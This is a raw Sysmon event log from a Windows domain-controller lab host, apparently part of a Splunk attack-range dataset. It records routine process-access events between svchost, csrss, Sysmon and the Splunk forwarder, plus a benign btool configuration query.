13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8EE2-6005-A900-00000000A301}16525100C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.274{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8EE2-6005-A800-00000000A301}50965104C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.268{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 